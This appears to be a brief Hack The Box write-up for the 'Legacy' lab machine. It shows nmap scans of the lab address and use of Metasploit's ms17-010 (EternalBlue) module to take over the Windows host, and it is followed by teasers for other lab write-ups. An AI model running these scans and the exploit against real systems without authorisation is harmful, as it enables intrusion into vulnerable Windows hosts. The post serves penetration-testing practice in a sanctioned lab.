tsustyle

Aspiring Red Team

Legacy

less than 1 minute read

Port Scanning and General Enumeration (Nmap)

Reading/Resources
- Nmap manual

My initial all ports scan showed 139, 445 and 3389 open. So I targeted those in my targets scan.

nmap -p 139,445,3389 -oN targeted -Pn -T4 -A 10.10.10.4

Also ran a script scan using the --script=vuln switch

nmap -Pn 10.10.10.4. -p 139,445 --script=vuln

Interesting…

Access (Metasploit, ms17-010)

Reading/Resources
- Metasploit
- EternalBlue (ms17-010)

Let’s follow up on ms17-010 lead from nmap using metasploit.

msfconsole search ms17-010

Set your options:

set rhosts 10.10.10.4 set lhost tun0

Fire!

That was easy. Capture the flags.

Share on

Twitter Facebook LinkedIn

You may also enjoy

THM Challenge

February 11, 2021

‘THM Challenge’ is a WebApp that I wrote to send along with my CV to TryHackMe when they were recruiting Content Engineers

Granny & Grandpa

January 27, 2021

Granny & Grandpa are a pair of identical easy rated boxes on Hack the Box. We’ll use metasploit to exploit a buffer overflow in IIS 6.0/WebDav for access and a kernel exploit for privesc

Optimum

January 25, 2021

‘Optimum’ is an easy rated box on Hack the Box. We’ll exploit a vulnerable version of HttpFileServer for access and use Windows Exploit Suggester to find a kernel exploit for privesc

Bashed

January 25, 2021

‘Bashed’ is an easy rated box on Hack the Box. We’ll use gobuster to uncover some hidden directories on a webserver, use a custom bash/php client to gain a shell and exploit a script being run as a cronjob for root